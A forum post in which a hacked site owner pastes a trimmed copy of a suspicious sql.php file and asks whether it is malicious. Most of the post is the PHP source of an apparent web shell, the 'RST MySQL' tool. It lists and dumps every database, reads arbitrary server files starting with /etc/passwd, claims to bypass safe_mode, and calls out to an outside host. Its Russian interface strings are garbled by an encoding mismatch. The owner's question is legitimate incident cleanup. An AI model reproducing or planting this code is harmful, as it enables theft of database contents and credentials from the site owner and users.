ttmw Posted March 31, 2011

My site recently got hacked and I'm trying to get rid of all the hacker files and search for anything suspicious. I've just come across a file in my root folder called sql.php that looks a little suspicious. I was wondering if anyone could confirm it is either useless or definitely a spam/hack file. Maybe it will stop someone else getting any problems too. I've had to trim it to fit in a post, but I'm guessing someone will be able to tell sharpish if it's a little dodgy...

<?php
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@set_magic_quotes_runtime(0);
// get rid of slashes when receiving data from a file
$self=$HTTP_SERVER_VARS['PHP_SELF'];
if(!ini_get("register_globals")){ import_request_variables("GPC"); }
// if PHP added slashes, strip them. Slashes are removed both from the global
// arrays and from all the variables that are created when register_globals=on
if (get_magic_quotes_gpc()) strips($GLOBALS);
function strips(&$el) {
  if (is_array($el)) {
    foreach($el as $k=>$v) {
      if($k!='GLOBALS') { strips($el[$k]); }
    }
  } else {
    $el = stripslashes($el);
  }
}
if (strtoupper(substr(PHP_OS, 0, 3)) === 'WIN') {
  $file = "C:\\tmp\\dump_".$db.".sql";
  $p_v=$SystemRoot."\my.ini";
  $os="win";
} else {
  $file = "/tmp/dump_".$db.".sql";
  $p_v="/etc/passwd";
}
if ($HTTP_GET_VARS['send']=='send_http') {
  function download($file, $type = false, $name = false, $down = false) {
    if(!file_exists($file)) exit;
    if(!$name) $name = basename($file);
    if($down) $type = "application/force-download";
    else if(!$type) $type = "application/download";
    $disp = $down ? "attachment" : "inline";
    header("Content-disposition: ".$disp."; filename=".$name);
    header("Content-length: ".filesize($file));
    header("Content-type: ".$type);
    header("Connection: close");
    header("Expires: 0");
    set_time_limit(0);
    readfile($file);
    unlink($file);
    exit;
  }
  if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['dump']=='bd'){
    $host = $HTTP_SERVER_VARS["SERVER_NAME"];
    $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
    $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
    mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
    if (sizeof($tabs) == 0) {
      // get the list of tables in the database
      $res = mysql_query("SHOW TABLES FROM $db", $connection);
      if (mysql_num_rows($res) > 0) {
        while ($row = mysql_fetch_row($res)) { $tabs[] .= $row[0]; }
      }
    }
    // open the file the dump is written to
    $fp = fopen($file, "w");
    fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n");
    foreach($tabs as $tab) {
      if ($add_drop) { fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n"); }
      // get the CREATE TABLE statement for the table
      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error());
      $row = mysql_fetch_row($res);
      fputs($fp, $row[1].";\n\n");
      // get the table data
      $res = mysql_query("SELECT * FROM `$tab`", $connection);
      if (mysql_num_rows($res) > 0) {
        while ($row = mysql_fetch_assoc($res)) {
          $keys = implode("`, `", array_keys($row));
          $values = array_values($row);
          foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
          $values = implode("', '", $values);
          $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
          fputs($fp, $sql);
        }
      }
      fputs ($fp, "#---------------------------------------------------------------------------------\n\n");
    }
    fclose($fp);
  }
  if ($HTTP_GET_VARS['strukt']=='d_strukt'){
    $host = $HTTP_SERVER_VARS["SERVER_NAME"];
    $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
    $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
    mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
    $fp = fopen($file, "w");
    fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n");
    // get the CREATE TABLE statement for the table
    $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
    $row = mysql_fetch_row($res);
    fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
    fputs($fp, $row[1].";\n\n");
    // get the table data
    $res = mysql_query("SELECT * FROM `$tbl`", $connection);
    if (mysql_num_rows($res) > 0) {
      while ($row = mysql_fetch_assoc($res)) {
        $keys = implode("`, `", array_keys($row));
        $values = array_values($row);
        foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
        $values = implode("', '", $values);
        $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n";
        fputs($fp, $sql);
      }
    }
    fclose($fp);
  }
  if ($HTTP_GET_VARS['strukt']=='t_strukt'){
    $host = $HTTP_SERVER_VARS["SERVER_NAME"];
    $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
    $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
    mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
    $fp = fopen($file, "w");
    fputs ($fp, "# RST MySQL tools\r\n# Home page: http://rst.void.ru\r\n#\n# Host settings:\n# $host ($ip)\n# MySQL version: (".mysql_get_server_info().")\n# Date: ". date("F j, Y, g:i a")."\n# "." dump db \"".$db."\" table \"".$tbl."\"\n#_________________________________________________________\n\n");
    $res = mysql_query("SHOW CREATE TABLE `".$tbl."`", $connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
    $row = mysql_fetch_row($res);
    fputs($fp, "DROP TABLE IF EXISTS `".$tbl."`;\n");
    fputs($fp, $row[1].";\n\n");
    fclose($fp);
  }
  if ($HTTP_GET_VARS['strukt']=='d'){
    $host = $HTTP_SERVER_VARS["SERVER_NAME"];
    $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
    $connection=mysql_connect($server.":".$port, $login, $passwd) or die("$h_error<b>".mysql_error()."</b>$f_error");
    mysql_select_db($db) or die("$h_error<b>".mysql_error()."</b>$f_error");
    $fp = fopen($file, "w");
    $res = mysql_query("SELECT * FROM `$tbl`", $connection);
    if (mysql_num_rows($res) > 0) {
      while ($row = mysql_fetch_assoc($res)) {
        $keys = implode("`, `", array_keys($row));
        $values = array_values($row);
        foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
        $values = implode("', '", $values);
        $sql = "INSERT INTO `$tbl`(`".$keys."`) VALUES ('".$values."');\n";
        fputs($fp, $sql);
      }
    }
    fclose($fp);
  }
  download($f_dump);
}
function send_header() {
  header("Content-type: image/gif");
  header("Cache-control: public");
  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
  header("Cache-control: max-age=".(60*60*24*7));
  header("Last-Modified: ".date("r",filemtime(__FILE__)));
}
if ($HTTP_GET_VARS['img']=='st_form_bg') {
  $st_form_bg='R0lGODlhCQAJAIAAAOfo6u7w8yH5BAAAAAAALAAAAAAJAAkAAAIPjAOnuJfNHJh0qtfw0lcVADs=';
  send_header();
  echo base64_decode($st_form_bg);
}
if ($HTTP_GET_VARS['img']=='bg_f') {
  $bg_f='R0lGODlhAQARAMQAANXW1+7w8uvt79TV18jJye3w8+zu8Ofp7MfIydzd3+fo687P0Nvc3eHi5eP'.
    'k5sPDw87OzwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BA'.
    'AAAAAALAAAAAABABEAAAUP4IMsQOIcRlAISsMMEBECADs=';
  send_header();
  echo base64_decode($bg_f);
}
if ($HTTP_GET_VARS['img']=='b_close') {
  $b_close='R0lGODlhdwAUAOYAANWEhdJYWNiwsc0PD9aTk88sLNA7O9rNztehotR1dk0AANQnJ4IAANc1Ndg9PWYAAL4'.
    'AAM8PD6AAANg8POiLi8yEhb0sLIYAAGIAAMRYWOeGhtc5Oc8NDeR3d1gAANuEhU4AAKcAANJbW9Z1dt1XV8'.
    'IAAONzc8QAAOqXl6gAAO2kpOJvb9IeHtuOj88QENYwMHUAANASEt9hYbAAAIwAAHkAAD0AAL0AAN5aWtQpK'.
    'c4MDNROT0UAAKwAANtJSdQqKtAUFOqYmMwCAuR2dtuiou2jo95bW8l1dtc3N+ucnI4AAJMAAHoAAD4AANWK'.
    'i+yfn5IAAOuZmdaVls4KCtlAQJQAAEAAANtMTOFra3EAAJEAALgAAOFpaWcAAOeFhXAAAN9dXeqVlTcAANg'.
    '6Ol4AANNnZ9m/wLUAANEbG9tKSoQAAOiOjuaCglYAAOJsbDQAANvc3cwAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    'AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACH5BAAAAAAALAAAAAB3ABQAAAf/gFFFKk9ha4eIiYqLjI2Oj5CRk'.
    'pOJGiY4GxwUQUkoFGygoaKjpKWmp6ipqqusokNGSBwzHV4UGh1uubq7vL2+v8DBwsPExbtgYy5nSjJYK1wk'.
    'adLT1NXW19jZ2tvc1h8tRB/d2BsxW0tZPldpVD9o7/Dx8vP09fb3+PnxO3D9cCP66k05UwWGBwcTGiyIEKe'.
    'hw4cQI0qcSLGixYsOB8A5UKYAxooQJDB4oAChQoYNBfgzEIeAvwQNzcg0w3KASzhmBrQ0A2CjTgJm4pShac'.
    'BMmThmCAg1OnQmgaEsIwLteeDnyzg9AwCA2fCmgAFFZ8pUGkdAzoYhR5ZMuLChgQMA/xDgjAP3ZhwD/Q7MV'.
    'UlAJYI4/QjohdkPKZwBPcvgRVCgXxmg/Yyq9Bgx8GC6AOz66/dXLgK+QyNDFgrnL1qRJE22bTggQBk4AOK0'.
    '7gmHdAKNAPAKCBAAZ2MBcXoD+A249uTXCfTCYUm8OIDhD4kLl621n8acGuE0n1s8ZW0z2h2mTc0WJWmfrzf'.
    'OvWmdtj8Er2P3ThCfeGGXB5Q3jC97c22H/M2Xnl5mTGdYAnAcBVhQ1zWUWGkPjbfWSRC95gQcwE0HXnXPJf'.
    'hQVi0tl1V8DYK3HHcgTqfXh3AEEKIIGAYHm4E4gYicjLGdF554qE24WoIBqCQFhgHodVQ/AKhUxv9rHJUhQ'.
    'FEJvhYUeJAhIFdsjvVGFng69SSAS0E5BN6SOPW2m5HZBRllaWXo5VFiDfUGYYQ9qsYQXv585V8BeAbWkFz+'.
    'FOePR/75o1iMCCpYWFmbRdXQntkNipU/OSq3nHeO9kMZj2rZ6RBvlLWmk0UFBMAchqV+pCpEv6XKWgCjOlR'.
    'qrHe5ONFrptHZaXmrWsRfr8D+CqxF/TjKKUkv5MCCDiWc4eyz0EYrrbQZVGDBtNhmq62z1V677bfSWlDBEd'.
    'OGQMMXHvAAhBA3pKCFGvDGK++89NZr77345qvvvvzKywQGIFjxxgk9QFEDBm0krPDCDDfs8MMQRyzxxBRXv'.
    'DArCDa8oXEIF3ShgBgahyzyyCSXbPLJKKes8soso3wBGU20LPPMNNdsc8qBAAA7';
  send_header();
  echo base64_decode($b_close);
}
$n_img = create_function('$tag,$f_n,$img_c', 'print \'<\'.$tag.\'>\';$f_n("$img_c");');
$h_error="<br><table align=center width=500 height=70 bgcolor=red><b>Œ¯Ë·Í‡ ‚ Á‡ÔÓÒÂ:</b><tr><td align=center><br><h5>";
$f_error="</h5></td></tr></table> <CENTER><FORM><INPUT type=\"button\" value=\" << Õ‡Á‡‰ \" onClick=\"history.go(-1)\"><BR> </FORM></CENTER> </td></tr></table></td></tr></table> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table>";
print " <html><HEAD><TITLE>RST MySQL</TITLE> <META http-equiv=Content-Type Pragma: no-cache; content=\"text/html; charset=windows-1251\"> <style> td { font-family: verdana, arial, ms sans serif, sans-serif; font-size: 11px; color: #000000; } BODY { margin-top: 4px; margin-right: 4px; margin-bottom: 4px; margin-left: 4px; scrollbar-face-color: #b6b5b5; scrollbar-highlight-color: #758393; scrollbar-3dlight-color: #000000; scrollbar-darkshadow-color: #101842; scrollbar-shadow-color: #ffffff; scrollbar-arrow-color: #000000; scrollbar-track-color: #ffffff; } A:link {COLOR:blue; TEXT-DECORATION: none} A:visited { COLOR:blue; TEXT-DECORATION: none} A:active {COLOR:blue; TEXT-DECORATION: none} A:hover {color:red;TEXT-DECORATION: none} input, textarea, select { background-color: #EBEAEA; border-style: solid; border-width: 1px; font-family: verdana, arial, sans-serif; font-size: 11px; color: #333333; padding: 0px; } </style></HEAD><BODY>";
if ($sapi_type == "cgi") { $php_type="CGI"; } else { $php_type="ÏÓ‰Ûθ"; }
$form_file=" <table width=80% align=center border=0> <tr><td align=center>◊ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·, Ò‚‡ ( <b>$server</b> )</td></tr> <tr><td> <table cellpadding=5 cellspacing=1 bgcolor=#FFFFFF border=0> <tr bgcolor=#DBDCDD><td align=center> œË ÛÒÎÓ‚ËË, ˜ÚÓ Ù‡ÈÎ ‰ÓÒÚÛÔÂÌ ‰Îˇ <b>˜ÚÂÌˡ</b> Ë ÔË Ì‡Î˘ËË Û ÔÓθÁÓ‚‡ÚÂΡ ÔË‚Ë΄ËË <b>FILE</b>, <b>SELECT</b>, <b>CREATE</b>, Ô‡‚ËθÌÓÏ ÔÛÚË Ë ËÏÂÌË - ‚ÓÁÏÓÊÌÓ ˜ÚÂÌË ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È·. Œ·ıÓ‰ Ó„‡Ì˘ÂÌËÈ ÔË <b>safe_mode</b> Ë <b>safe_basedir</b> </td></tr></table></td></tr> <form method=\"get\" action=\"$self?f=x_file\"> <input type=\"hidden\" name=\"s\" value=\"$s\"> <input type=\"hidden\" name=\"server\" value=\"$server\"> <input type=\"hidden\" name=\"port\" value=\"$port\"> <input type=\"hidden\" name=\"login\" value=\"$login\"> <input type=\"hidden\" name=\"passwd\" value=\"$passwd\"> <tr><td align=center><br>œÓÎÌ˚È ÔÛÚ¸ Í Ù‡ÈÎÛ: <input type=\"text\" name=\"p_file\" value=\"$p_v\" size=\"40\"> <input type=\"submit\" value=\"ÔÓ͇Á‡Ú¸ Ù‡ÈÎ\"> </td></tr></table><br>";
$start_form="<br> <table align=center border=0 width=100% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF> <tr> <td> <table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td width=25> <font face=Webdings size=6>Ņ</font> </td> <td> <font size=4><b>RST MySQL</b></font> <font color=#FFFFFF><b>v(2.0)</b></font> </td> <td width=33% align=right> ".date ("j F- Y- g:i")." </td> </tr> </table> </td></tr> </table> </td></tr> <tr><td> <table align=center border=0 width=80% cellpadding=2 cellspacing=0 bgcolor=#FFFFFF> <tr> <td bgcolor=#DBDCDD valign=top width=200><br> <center><b>”ÚËÎËÚ‡ ‰Îˇ ‡·ÓÚ˚ Ò MySQL</b></center><hr width=98%> <li>œÓÒÏÓÚ ·‡Á Ë Ú‡·Îˈ. <li>œÓËÁ‚ÓθÌ˚ Á‡ÔÓÒ˚ Í ¡ƒ. <li>–‰‡ÍÚËÓ‚‡ÌË ·‡Á Ë Ú‡·Îˈ. <li>ƒ‡ÏÔ˚ ¡ƒ ËÎË Ú‡·Îˈ.<hr width=98%> Type - FREE<br> Home page: <a href=http://rst.void.ru><b>http://rst.void.ru</b></a> <center><br><br><font face=Webdings size=+18 color=#B6B5B5>¨</font><center> </td> <td background=".$self."?img=st_form_bg bgcolor=#E6E7E9><center><font size=2> <br>ƒÎˇ ÒÓ‰ËÌÂÌˡ Ò Ò‚ÂÓÏ MySQL ‚‚‰ËÚ <b>»Ãfl</b>, <b>œ¿–ŒÀ‹</b> (ÔÓθÁÓ‚‡ÚÂΡ MySQL) Ë ËÏˇ <b>’Œ—“¿</b>.</font></center><br> <li>≈ÒÎË ÎÓ„ËÌ ˛Á‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ËÏˇ ‚·‰Âθˆ‡ ÔÓˆÂÒÒ‡. <li>≈ÒÎË Ô‡Óθ ˛Á‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÛÒÚÓÈ Ô‡Óθ. <li>≈ÒÎË ËÏˇ Ò‚‚‡ mysql Ì Û͇Á‡ÌÓ ˇ‚ÌÓ, ÔÓ ÛÏÓΘ‡Ì˲ ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ <b>localhost</b> <li>≈ÒÎË ÔÓÚ ‰Îˇ Ò‚‚‡ mysql Ì Û͇Á‡Ì ˇ‚ÌÓ, ÔÓ‰ÒÚ‡‚ΡÂÚÒˇ ÔÓÚ ÔÓ ÛÏÓΘ‡Ì˲, Ó·˚˜ÌÓ (<b>3306</b>)<br><br> <center>¬ÂÒˡ PHP (<b>".phpversion()."</b>) ID PHP script (<b>".get_current_user( )."</b>)</center> <br><table align=center> <tr><td>ËÏˇ ˛Á‡ MySQL</td><td align=right>Ô‡Óθ ˛Á‡ MySQL </td></tr> <form method=\"get\" action=\"$self\"> <input type=\"hidden\" name=\"s\" value=\"y\"> <tr> <td><input type=\"text\" name=\"login\" value=\"root\" maxlength=\"64\"></td> <td align=right><input type=\"text\" name=\"passwd\" value=\"$passwd\" maxlength=\"64\"></td> </tr> <tr><td>—‚ MySQL</td><td>ÔÓÚ</td></tr> <tr> <td><input type=\"text\" name=\"server\" value=\"localhost\" maxlength=\"64\"></td> <td><input type=\"text\" name=\"port\" value=\"3306\" maxlength=\"6\" size=\"3\"> <input type=\"submit\" value=\"ÔÓ‰Íβ˜ËÚ¸Òˇ\"></td> </tr></table><br> </td> </tr> </table> </td></tr> <tr><td> <table align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td align=center> free script ©RusH Security Team </td> </tr> </table> </td></tr> </table> </td></tr></table><center><font size=-1 color=#D0D1D2>(coded by dinggo)</font></center> ";
if ($os =='win') {
  $os="OS- <b>".$HTTP_ENV_VARS["OS"]."</b>";
}else{
  $str_k=$_ENV["BOOT_FILE"];
  $k=preg_replace ("/[a-zA-Z\/]/","", $str_k);
  $os="OS\Kernel: <b>".$_ENV["BOOT_IMAGE"].$k."</b>";
}
if (!isset($s) || $HTTP_GET_VARS[s] != 'y') {
  print $start_form;
  $serv = array(127,192,172,10);
  $adrr=@explode('.', $HTTP_SERVER_VARS["SERVER_ADDR"]);
  if (!in_array($adrr[0], $serv)) {
    // when a new version of the tool appears, show that a new version
    // is available and offer to download it from the site
    @print "<img src=\"http://rst.void.ru/version_sql/version.php\" border=0 height=0>";
    @readfile ("http://rst.void.ru/version_sql/version.php");
  }
  exit;
}
$form_ad_b="<br> <table width=80% align=center border=0 cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> <tr> <td> <table width=100% align=center border=0 cellpadding=4 cellspacing=0 bgcolor=#DBDCDD> <td> MySQL <b>$server</b> v.(<b>".mysql_get_server_info()."</b>) </td> <td align=center> <b>".$HTTP_SERVER_VARS["SERVER_SOFTWARE"]."</b> </td> <td align=right> ¬ÂÒˡ PHP (<b>".phpversion()."</b>) $php_type </td> </tr> <tr bgcolor=#DBDCDD> <td> IP:<b>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</b> Name:<b>".$HTTP_SERVER_VARS["SERVER_NAME"]."</b> </td> <td align=center> ID PHP script (<b>".get_current_user( )."</b>) </td> <td align=right> $os </td> </tr> </table> </td></tr></table> <table width=80% align=center border=0 cellpadding=5 cellspacing=1> <tr> <td> <a href=\"$self?s=$s&stat=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>—Ú‡ÚËÒÚË͇ MySQL</b></a> </td> <td align=center> <a href=\"$self?s=$s&php=ok\" target=\"_blank\"><b>»ÌÙÓχˆËˇ PHP (ALL)</b></a> </td> <td align=right> <a href=\"$self?s=$s&proc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÓˆÂÒÒ˚ MySQL </b></a> </td> </tr> <tr> <td> <a href=\"$self?s=$s&apc=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ Apache </b></a> </td> <td align=center> <a href=\"$self?s=$s&var=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\"><b>œÂÂÏÂÌÌ˚ MySQL </b></a> </td> <td align=right> <a href=\"$self?s=$s&f=x_file&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"œÓÒÏÓÚ ÔÓËÁ‚ÓθÌÓ„Ó Ù‡È· Ò‚‡ ‰‡Ê ÔË ‚Íβ˜ÂÌÓÏ safe_mode Ë safe_mode_exec_dir\"><b>‘‡ÈÎ *?</b></a> </td> </tr> </table><br> <table width=300 align=center cellpadding=0 cellspacing=1 bgcolor=#FFFFFF> <tr bgcolor=#DBDCDD><td> <table align=center cellpadding=0 cellspacing=0> <tr bgcolor=#DBDCDD> <td> <table cellpadding=4><tr><td><b>—ÓÁ‰‡Ú¸ ÌÓ‚Û˛ ·‡ÁÛ ‰‡ÌÌ˚ı</b></td></tr><tr><td> <form method=\"get\" action=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"> <input type=\"hidden\" name=\"s\" value=\"$s\"> <input type=\"hidden\" name=\"server\" value=\"$server\"> <input type=\"hidden\" name=\"port\" value=\"$port\"> <input type=\"hidden\" name=\"login\" value=\"$login\"> <input type=\"hidden\" name=\"passwd\" value=\"$passwd\"> <input type=\"text\" name=\"new_db\" value=\"\" maxlength=\"64\"> <input type=\"submit\" value=\"ÒÓÁ‰‡Ú¸\"></td> </tr></table> </td> </tr> </table> </td> </tr></table></form> <table width=80% align=center border=0 cellpadding=0> <tr align=right> <td width=85%></td> <td width=15> <a href=$self><img src=".$self."?img=b_close border=0 title=close></a> </td> </tr> </table> ";
$cnt_b=mysql_num_rows(mysql_list_dbs()); // number of databases on the MySQL server
print " <table align=center border=0 width=100% cellpadding=1 cellspacing=0 bgcolor=#FFFFFF> <tr> <td> <table align=center width=100% cellpadding=0 cellspacing=1 bgcolor=#000000> <tr><td> <table background=".$self."?img=bg_f border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#C2C2C2> <tr> <td> <font face=Webdings size=6>Ņ</font> </td> <td width=33%> <font size=4><b>RST MySQL</b></font> </td> <td width=33% align=center> <font color=blue><b>$server</b></font> [CONNECTION Ok] ¬ÒÂ„Ó ·‡Á: <b>$cnt_b</b> </td> <td width=33% align=right> ".date ("j F- Y- g:i")." </td> </tr> </table> </td></tr> </table> </td></tr> <tr><td> <table background=".$self."?img=send_img align=center border=0 width=100% cellpadding=0 cellspacing=0 bgcolor=#FFFFFF> <tr> <td bgcolor=#DBDCDD valign=top width=170>";
if (isset($server)&&isset($port)&&isset($login)&&isset($passwd)){
  $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>Œ¯Ë·Í‡ ÒÓ‰ËÌÂÌˡ Ò MySQL Ò‚ÂÓÏ <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>¬ÂÓˇÚÌ˚ ӯ˷ÍË:</b><li>Õ ԇ‚ËθÌ˚È ‡‰ÂÒ Ò‚‡ <b>$server</b><li>Õ ԇ‚ËθÌ˚È ÌÓÏ ÔÓÚ‡ <b>$port</b><li>Õ ‚ÂÌÓ ËÏˇ (login) ˛Á‡ mysql <b>$login</b><li>Õ ‚ÂÌ˚È Ô‡Óθ (password) ˛Á‡ mysql <b>$passwd</b><li>ƒÓÒÚÛÔ Í Ò‚ÂÛ $server Á‡Ô¢ÂÌ Ò ‡‰ÂÒ‡ <b>".getenv('REMOTE_ADDR')."</b><li>”‰‡ÎÂÌÌ˚È Ò‚ ‚ÂÏÂÌÌÓ Ì ‰ÓÒÚÛÔÂÌ</td></tr></table><br></td></tr></table><script>alert('Õ ‚ÓÁÏÓÊÌÓ ÛÒÚ‡ÌÓ‚ËÚ¸ ÒÓ‰ËÌÂÌËÂ Ò MySQL Ò‚ÂÓÏ $server \\n\\n œÓ‚¸Ú ԇ‚ËθÌÓÒÚ¸ ‚ıÓ‰ˇ˘Ëı ‰‡ÌÌ˚ı:\\n\\nÒ‚ $server\\nÔÓÚ $port\\nËÏˇ $login\\nÔ‡Óθ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
}
/*---------------------- L E F T B L O C K (menu bd)! -------------------*/
/* show all databases on the server */
if ($connection&&!isset($db)) {
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
    "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÂÌÛÚ¸Òˇ ‚ ̇˜‡ÎÓ Ë Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ ·‡Á\"><font color=green><b>".
    "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr></table>";
  $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
  while ( $row=mysql_fetch_row($result) ){
    $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); // number of tables in the database
    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
    if ($cnt_title < 1) {
      print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
    }else{
      print "<a href=\"$_SERVER[php_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"¬ÒÂ„Ó Ú‡·Îˈ $cnt_title\"><b>$row[0]</b></a>";
    }
    print "</td></tr></table>";
  }
}
// list of tables in the database
if (isset($db)){
  $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
  print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
    "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
    "œÓ͇Á‡Ú¸ ‚Ò ·‡Á˚</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
  print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
    "---[ <a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"Ó·ÌÓ‚ËÚ¸ ÒÔËÒÓÍ Ú‡·Îˈ\"><b>$db</b></a>".
    " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
  while ( $row=mysql_fetch_array($result) ){
    // get the number of rows (records) in the table
    $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
    $count_row= mysql_fetch_array($count);
    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
      "<tr><td bgcolor=#DBDCDD>";
    if ($count_row[0] < 1) {
      print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a> ($count_row[0])</td></tr></table>";
    }else{
      print "<a href=\"$_SERVER[php_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a> ($count_row[0])</td></tr></table>";
    }
    @mysql_free_result($count);
  }
}
/*---------------------- END L E F T B L O C K (menu bd)! -------------------*/
print " </td> <td valign=top bgcolor=#E6E7E9>";
/*------------------------ R I G H T B L O C K ! -----------------------*/
if ($connection&&!isset($db)) {
  $anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection);
  if (mysql_num_rows($anon)>0) {
    print "<table align=center><tr><td><b>¬ÌËχÌËÂ!<b></td></tr><tr><td bgcolor=red>¿ÌÓÌËÏÌ˚Ï ÔÓθÁÓ‚‡ÚÂÎˇÏ ‡Á¯ÂÌÓ ÔÓ‰Íβ˜ÂÌËÂ Í Ò‚ÂÛ MySQL</td></tr></table>";
  }
  print $form_ad_b;
}
/*------------- MySQL processes ------------*/
if (isset($proc) && $proc=="TRUE"){
  $result = mysql_query("SHOW PROCESSLIST", $connection);
  print "<center><font size=2>œÓˆÂÒÒ˚ MySQL Ò‚‡ [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
  while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
